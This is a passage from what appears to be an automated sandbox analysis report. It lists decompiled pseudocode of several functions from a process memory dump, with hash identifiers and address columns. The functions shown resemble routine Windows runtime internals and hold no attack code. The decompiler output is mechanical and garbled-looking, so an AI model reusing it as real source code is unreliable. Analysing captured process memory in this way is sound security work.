                                                        0x04895292
                                                        0x00000000
                                                        0x04895288
                                                        0x0489527e

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 613c0afceef9913030381a609c004ebdd465a38987f271409eb205f983ae7c1f
                                                        • Instruction ID: f755763594a1dd3cbb08d76c1673a7b30c5bd3d86bbf550e5fba7537f6ded5b7
                                                        • Opcode Fuzzy Hash: 613c0afceef9913030381a609c004ebdd465a38987f271409eb205f983ae7c1f
                                                        • Instruction Fuzzy Hash: DD31F332242A04AFDB2AAB58CC90B7677A5AF41764F154F29E955CB191E7B0BC00C691
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D3D43, Relevance: .1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048D3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E048A7B60(0, _t61, 0x48711c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E048A7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L048B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                        0x048d3d4c
                                                        0x048d3d50
                                                        0x048d3d55
                                                        0x048d3d5e
                                                        0x0490e79a
                                                        0x00000000
                                                        0x0490e79a
                                                        0x048d3d68
                                                        0x0490e789
                                                        0x048d3d9d
                                                        0x048d3da3
                                                        0x048d3daf
                                                        0x048d3db5
                                                        0x048d3dbc
                                                        0x048d3dc4
                                                        0x048d3dc9
                                                        0x048d3dce
                                                        0x0490e7ae
                                                        0x0490e7ae
                                                        0x048d3dde
                                                        0x048d3de2
                                                        0x048d3de7
                                                        0x048d3e0d
                                                        0x048d3e13
                                                        0x048d3e16
                                                        0x048d3e1e
                                                        0x048d3e25
                                                        0x048d3e28
                                                        0x00000000
                                                        0x00000000
                                                        0x048d3e2a
                                                        0x048d3e2f
                                                        0x048d3e37
                                                        0x048d3e37
                                                        0x00000000
                                                        0x048d3e37
                                                        0x048d3e31
                                                        0x00000000
                                                        0x048d3e31
                                                        0x048d3e20
                                                        0x048d3e20
                                                        0x048d3e35
                                                        0x00000000
                                                        0x048d3de9
                                                        0x048d3de9
                                                        0x048d3de9
                                                        0x048d3dee
                                                        0x048d3dfd
                                                        0x048d3dff
                                                        0x048d3e02
                                                        0x048d3e05
                                                        0x048d3e05
                                                        0x00000000
                                                        0x048d3df0
                                                        0x048d3de7
                                                        0x0490e78f
                                                        0x0490e794
                                                        0x048d3d79
                                                        0x048d3d84
                                                        0x048d3d89
                                                        0x048d3d8e
                                                        0x00000000
                                                        0x0490e7a4
                                                        0x048d3d96
                                                        0x048d3d9a
                                                        0x00000000
                                                        0x048d3d9a
                                                        0x00000000
                                                        0x0490e794
                                                        0x048d3d6e
                                                        0x048d3d73
                                                        0x00000000
                                                        0x0490e7b5
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 92e162c396a0b3117ad6d3f04d96db390bd2cc23bd9481304997154886c40cd2
                                                        • Instruction ID: 22cd8c39b97314b0c648a84f7ac1b202d7d59f30ae11a76bc54cd5ddbee954c1
                                                        • Opcode Fuzzy Hash: 92e162c396a0b3117ad6d3f04d96db390bd2cc23bd9481304997154886c40cd2
                                                        • Instruction Fuzzy Hash: 5C31B231B02614DFD7248F29C841A6ABBE5EF95704B058A7AE846CB790E770E840DB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048CA61C, Relevance: .1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E048CA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4970220);
				E048ED08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x4987b9c; // 0x0
				_t55 = L048B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E048ED0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x4987b10 =  *0x4987b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x498536c; // 0x26ad08
					if( *_t51 != 0x4985368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x4985368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x498536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E048CA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                        0x048ca61c
                                                        0x048ca61e
                                                        0x048ca623
                                                        0x048ca628
                                                        0x048ca62b
                                                        0x048ca62d
                                                        0x048ca648
                                                        0x048ca64a
                                                        0x048ca64f
                                                        0x04909b44
                                                        0x048ca6ec
                                                        0x048ca6f1
                                                        0x048ca6f1
                                                        0x048ca655
                                                        0x048ca657
                                                        0x048ca65a
                                                        0x048ca65d
                                                        0x048ca662
                                                        0x048ca663
                                                        0x048ca667
                                                        0x048ca668
                                                        0x048ca66d
                                                        0x048ca706
                                                        0x048ca706
                                                        0x04909bda
                                                        0x04909be6
                                                        0x04909beb
                                                        0x00000000
                                                        0x04909beb
                                                        0x048ca679
                                                        0x04909b7a
                                                        0x00000000
                                                        0x04909b7a
                                                        0x048ca683
                                                        0x048ca6f4
                                                        0x048ca6f7
                                                        0x048ca6f9
                                                        0x048ca6fd
                                                        0x048ca6a0
                                                        0x048ca6a0
                                                        0x048ca6ad
                                                        0x048ca6af
                                                        0x048ca6b4
                                                        0x04909ba7
                                                        0x04909bac
                                                        0x00000000
                                                        0x00000000
                                                        0x04909bc6
                                                        0x04909bce
                                                        0x04909bd1
                                                        0x04909bd3
                                                        0x04909bd3
                                                        0x00000000
                                                        0x04909bd1
                                                        0x048ca6bd
                                                        0x048ca6c3
                                                        0x048ca6c6
                                                        0x048ca6d2
                                                        0x048ca701
                                                        0x048ca704
                                                        0x00000000
                                                        0x048ca704
                                                        0x048ca6d4
                                                        0x048ca6d6
                                                        0x048ca6d9
                                                        0x048ca6db
                                                        0x048ca6e1
                                                        0x048ca6e6
                                                        0x048ca6e8
                                                        0x048ca6e8
                                                        0x048ca6ea
                                                        0x00000000
                                                        0x048ca6ea
                                                        0x048ca688
                                                        0x048ca692
                                                        0x048ca694
                                                        0x048ca699
                                                        0x00000000
                                                        0x00000000
                                                        0x048ca69d
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4359736f0403079117cb659ac45346bed4ccaff1edf969226a9aaa3ef0ae874
                                                        • Instruction ID: b7cbf2f438d63a55f153463ef9ce21d25d79dfb74aaeae5b1eac22bb9d153fbc
                                                        • Opcode Fuzzy Hash: d4359736f0403079117cb659ac45346bed4ccaff1edf969226a9aaa3ef0ae874
                                                        • Instruction Fuzzy Hash: 264138B5A00209DFDB18CF58D890BA9BBF2FB49314F1585ADE804EB385D774E941CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04917016, Relevance: .1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 76%
                                                        			E04917016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x498d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04916B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04916B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E048B7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E048D9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E048DB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L048B4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                        0x04917016
                                                        0x0491701e
                                                        0x0491702b
                                                        0x04917033
                                                        0x04917037
                                                        0x0491703c
                                                        0x0491703e
                                                        0x04917041
                                                        0x04917045
                                                        0x0491704a
                                                        0x04917050
                                                        0x04917055
                                                        0x0491705a
                                                        0x04917062
                                                        0x04917062
                                                        0x0491705a
                                                        0x04917064
                                                        0x04917064
                                                        0x04917067
                                                        0x04917071
                                                        0x04917096
                                                        0x0491709b
                                                        0x049170a2
                                                        0x049170a6
                                                        0x049170a7
                                                        0x049170ad
                                                        0x049170b3
                                                        0x049170b6
                                                        0x049170bb
                                                        0x049170c3
                                                        0x049170c3
                                                        0x049170c6
                                                        0x049170cd
                                                        0x049170dd
                                                        0x049170e0
                                                        0x049170e2
                                                        0x049170e2
                                                        0x049170ee
                                                        0x04917101
                                                        0x049170f0
                                                        0x049170f9
                                                        0x049170f9
                                                        0x0491710a
                                                        0x0491710e
                                                        0x04917112
                                                        0x04917117
                                                        0x04917118
                                                        0x04917118
                                                        0x049170bb
                                                        0x0491711d
                                                        0x04917123
                                                        0x04917131
                                                        0x04917131
                                                        0x04917136
                                                        0x0491713d
                                                        0x0491713e
                                                        0x0491713f
                                                        0x0491714a
                                                        0x0491714a
                                                        0x04917084
                                                        0x04917088
                                                        0x00000000
                                                        0x0491708e
                                                        0x0491708e
                                                        0x04917092
                                                        0x00000000
                                                        0x04917092

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a550b16a6cd11323f0260aae11da9e490cef4d9ff40bcf3d39eb0607ed1b68cd
                                                        • Instruction ID: bd564dafe2c3ff74ac087add901ee14e69670a920888b114cdd9aea23b2e88e9
                                                        • Opcode Fuzzy Hash: a550b16a6cd11323f0260aae11da9e490cef4d9ff40bcf3d39eb0607ed1b68cd
                                                        • Instruction Fuzzy Hash: 4C3195726087559FC321DF68C940E6AB7E9BFC8700F054A69F89587790E770F904C7A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048BC182, Relevance: .1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E048BC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E048B7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04968D34(_v8, _t80);
					}
					E048B2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E048AFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04968833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E048AFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E048DB180();
						if(_a4 != 0) {
							E048B2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E048BBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E048BBB2D(_t16, _t15);
						E048BB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E048AFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E048AFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E048AFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                        0x048bc18d
                                                        0x048bc18f
                                                        0x048bc191
                                                        0x048bc19b
                                                        0x048bc1a0
                                                        0x048bc1d4
                                                        0x048bc1de
                                                        0x04902d6e
                                                        0x048bc1e4
                                                        0x048bc1e4
                                                        0x048bc1e4
                                                        0x048bc1ec
                                                        0x04902d7d
                                                        0x04902d7d
                                                        0x048bc1f3
                                                        0x048bc1ff
                                                        0x04902d88
                                                        0x04902d8d
                                                        0x04902d94
                                                        0x04902d94
                                                        0x04902d9f
                                                        0x04902da4
                                                        0x04902dab
                                                        0x04902db0
                                                        0x04902db2
                                                        0x04902db3
                                                        0x04902db4
                                                        0x04902dbc
                                                        0x04902dc3
                                                        0x04902dc3
                                                        0x048bc205
                                                        0x048bc205
                                                        0x048bc208
                                                        0x048bc20e
                                                        0x048bc211
                                                        0x048bc216
                                                        0x048bc219
                                                        0x048bc21f
                                                        0x048bc222
                                                        0x048bc22c
                                                        0x048bc234
                                                        0x048bc23a
                                                        0x048bc23f
                                                        0x048bc245
                                                        0x048bc24b
                                                        0x048bc251
                                                        0x048bc25a
                                                        0x048bc276
                                                        0x048bc27d
                                                        0x048bc27d
                                                        0x048bc25c
                                                        0x048bc25c
                                                        0x00000000
                                                        0x048bc25e
                                                        0x048bc1a4
                                                        0x048bc1aa
                                                        0x048bc1b3
                                                        0x048bc265
                                                        0x048bc26c
                                                        0x048bc26c
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                        • Instruction ID: e5adc4432cdaa745e86d0de5dfd2de16204d3769743b87f85defcb192e2c9451
                                                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                        • Instruction Fuzzy Hash: 1C31147170154AAEE704EBB8C480BE9FB58BF42208F048A6EC558D7341DBB47A59D7E2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048CA70E, Relevance: .1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E048CA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x4987b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x4987b10 = 8;
					 *0x4987b14 = 0x4987b0c;
					 *0x4987b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E048CA990(0x4987b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L048CA840(__edx, __ecx, __ecx, _t52, 0x4987b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x4987b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x4987b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x4987b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L048B4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x4987b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E048DF3E0(_t50,  *0x4987b14, _t8 >> 3);
						_t28 =  *0x4987b14; // 0x771c7b0c
						__eflags = _t28 - 0x4987b0c;
						if(_t28 != 0x4987b0c) {
							L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x4987b14 = _t50;
						_t48 = _v12;
						 *0x4987b10 = _t9;
						goto L6;
					}
					 *0x4987b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                        0x048ca713
                                                        0x048ca714
                                                        0x048ca717
                                                        0x048ca71d
                                                        0x048ca720
                                                        0x048ca722
                                                        0x048ca727
                                                        0x048ca74a
                                                        0x048ca754
                                                        0x048ca75e
                                                        0x048ca768
                                                        0x048ca76a
                                                        0x048ca773
                                                        0x048ca78b
                                                        0x048ca790
                                                        0x048ca792
                                                        0x048ca741
                                                        0x048ca741
                                                        0x048ca743
                                                        0x048ca749
                                                        0x048ca749
                                                        0x048ca732
                                                        0x048ca73a
                                                        0x048ca797
                                                        0x048ca79d
                                                        0x048ca7a3
                                                        0x048ca7a9
                                                        0x048ca7b6
                                                        0x048ca7bc
                                                        0x048ca7ca
                                                        0x048ca7e0
                                                        0x048ca7e2
                                                        0x048ca7e4
                                                        0x04909bf2
                                                        0x00000000
                                                        0x04909bf2
                                                        0x048ca7ed
                                                        0x048ca7f2
                                                        0x048ca800
                                                        0x048ca805
                                                        0x048ca80d
                                                        0x048ca812
                                                        0x04909c08
                                                        0x04909c08
                                                        0x048ca818
                                                        0x048ca81b
                                                        0x048ca821
                                                        0x048ca824
                                                        0x00000000
                                                        0x048ca824
                                                        0x048ca7ae
                                                        0x00000000
                                                        0x048ca7ae
                                                        0x048ca73c
                                                        0x048ca73e
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4fd84c3b6201a8ca233c15ae2b1fa0adf7fd634e5b060bf50ef30e66bf2e11c7
                                                        • Instruction ID: 3e07fc578cc77c64cce14f7ade64f4fc90d5f7e804d10aac929678692c39ae87
                                                        • Opcode Fuzzy Hash: 4fd84c3b6201a8ca233c15ae2b1fa0adf7fd634e5b060bf50ef30e66bf2e11c7
                                                        • Instruction Fuzzy Hash: F23168B16042089FD715CB9CDC80F697BBAFB85614F244AAEE055D7240E7B8AD01CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C61A0, Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 97%
                                                        			E048C61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E048C5E50(0x48767cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04969D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0489F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                        0x048c61b3
                                                        0x048c61b5
                                                        0x048c61bd
                                                        0x048c61c3
                                                        0x048c61c7
                                                        0x048c61d2
                                                        0x048c61ff
                                                        0x048c61ff
                                                        0x048c6201
                                                        0x048c6207
                                                        0x048c6207
                                                        0x048c61d4
                                                        0x048c61d9
                                                        0x00000000
                                                        0x00000000
                                                        0x048c61df
                                                        0x048c61e2
                                                        0x00000000
                                                        0x00000000
                                                        0x048c61e6
                                                        0x048c61e8
                                                        0x048c61ee
                                                        0x048c61ee
                                                        0x048c61f9
                                                        0x0490762f
